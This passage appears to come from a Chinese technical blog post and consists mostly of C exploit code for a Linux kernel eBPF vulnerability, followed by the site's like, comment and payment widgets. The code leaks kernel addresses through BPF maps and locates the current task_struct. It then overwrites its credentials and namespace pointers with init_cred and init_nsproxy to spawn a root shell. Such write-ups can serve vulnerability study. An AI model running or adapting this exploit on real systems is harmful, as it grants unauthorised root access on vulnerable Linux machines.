        setbuf(stdout, NULL);
        setbuf(stderr, NULL);
}

void trigger() {
        write(sockets[0], trigger_buf, 0x100);
}

void prep() {

        value1 = (uint64_t*)calloc(0x2000, 1);
        value2 = (uint64_t*)calloc(0x2000, 1);
        prctl(PR_SET_NAME, "XiaozaYa");

        map_fd1 = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x2000, 1);
        if (map_fd1 < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");

        map_fd2 = bpf_map_create(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x2000, 1);
        if (map_fd2 < 0) perror("BPF_MAP_CREATE"), err_exit("BPF_MAP_CREATE");

        prog_fd = bpf(BPF_PROG_LOAD, &attr);
        if (prog_fd < 0) puts(bpf_log_buf), perror("BPF_PROG_LOAD"), err_exit("BPF_PROG_LOAD");

        if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0)
                perror("socketpair()"), err_exit("socketpair()");

        if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd)) < 0)
                perror("socketpair SO_ATTACH_BPF"), err_exit("socketpair()");
//        puts(bpf_log_buf);
}

void pwn() {

        uint64_t buf[0x2000/8] = { 0 };
        memset(trigger_buf, 'A', sizeof(trigger_buf));
        trigger_buf[8] = '\xc0';
        value2[0] = 0xdead;
        bpf_map_update_elem(map_fd1, &key, value1, BPF_ANY);
        bpf_map_update_elem(map_fd2, &key, value2, BPF_ANY);
        for (int i = 0; i < 15; i++) {
                value2[0] = 0xdead;
                bpf_map_update_elem(map_fd2, &key, value2, BPF_ANY);
                trigger_buf[8+1] = i*0x10;
                trigger();

                memset(buf, 0, sizeof(buf));
                bpf_map_lookup_elem(map_fd2, &key, buf);
                uint64_t data = *(uint64_t*)buf;
                if (map_addr == -1 && (data&0xffff000000000fff) == 0xffff0000000000c0)
                        map_addr = data - 0xc0;
                printf("[---dump----] %-016llx\n", data);
        }
        if (map_addr == -1)
                err_exit("FAILED to leak map_addr");


        hexx("map_addr", map_addr);
        value2[0] = 0xdead;
        bpf_map_update_elem(map_fd2, &key, value2, BPF_ANY);
        trigger_buf[8] = '\x00';
        trigger_buf[8+1] = (char)((map_addr >> 8)&0xff);
        trigger();
        memset(buf, 0, sizeof(buf));
        bpf_map_lookup_elem(map_fd2, &key, buf);
        binary_dump("LEAK DATA", buf, 0x20);

        koffset = *(uint64_t*)buf - array_map_ops;
        init_cred += koffset;
        init_task += koffset;
        init_nsproxy += koffset;
        hexx("koffset", koffset);

        puts("======= searching current task_struct =======");
        current_task = init_task;
        for (;;) {
                value2[0] = 0xbeef;
                bpf_map_update_elem(map_fd2, &key, value2, BPF_ANY);
                *(uint64_t*)(trigger_buf+8) = current_task+0x8c0;
                trigger();
                memset(buf, 0, sizeof(buf));
                bpf_map_lookup_elem(map_fd2, &key, buf);
                current_task = buf[0] - 0x8b8;

                value2[0] = 0xbeef;
                bpf_map_update_elem(map_fd2, &key, value2, BPF_ANY);
                *(uint64_t*)(trigger_buf+8) = current_task+0xb98;
                trigger();
                memset(buf, 0, sizeof(buf));
                bpf_map_lookup_elem(map_fd2, &key, buf);
                if (buf[0] == tag) {
                        hexx("Hit current_task", current_task);
                        break;
                }
                hexx("current_task", current_task);
        }

        puts("======= replace cred/real_cred wiht init_cred =======");
        value2[0] = 0xdeef;
        value2[1] = init_cred;
        bpf_map_update_elem(map_fd2, &key, value2, BPF_ANY);
        *(uint64_t*)(trigger_buf+8) = current_task+0xb88;
        trigger();

        value2[1] = init_cred;
        bpf_map_update_elem(map_fd2, &key, value2, BPF_ANY);
        *(uint64_t*)(trigger_buf+8) = current_task+0xb80;
        trigger();

        value2[1] = init_nsproxy;
        bpf_map_update_elem(map_fd2, &key, value2, BPF_ANY);
        *(uint64_t*)(trigger_buf+8) = current_task+0xbf0;
        trigger();

}

int main(int argc, char** argv, char** envp)
{
        init();
        prep();
        pwn();
        get_root_shell();
        puts("EXP NERVER END!");
        return 0;
}

效果如下:
在这里插入图片描述

  • 19
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值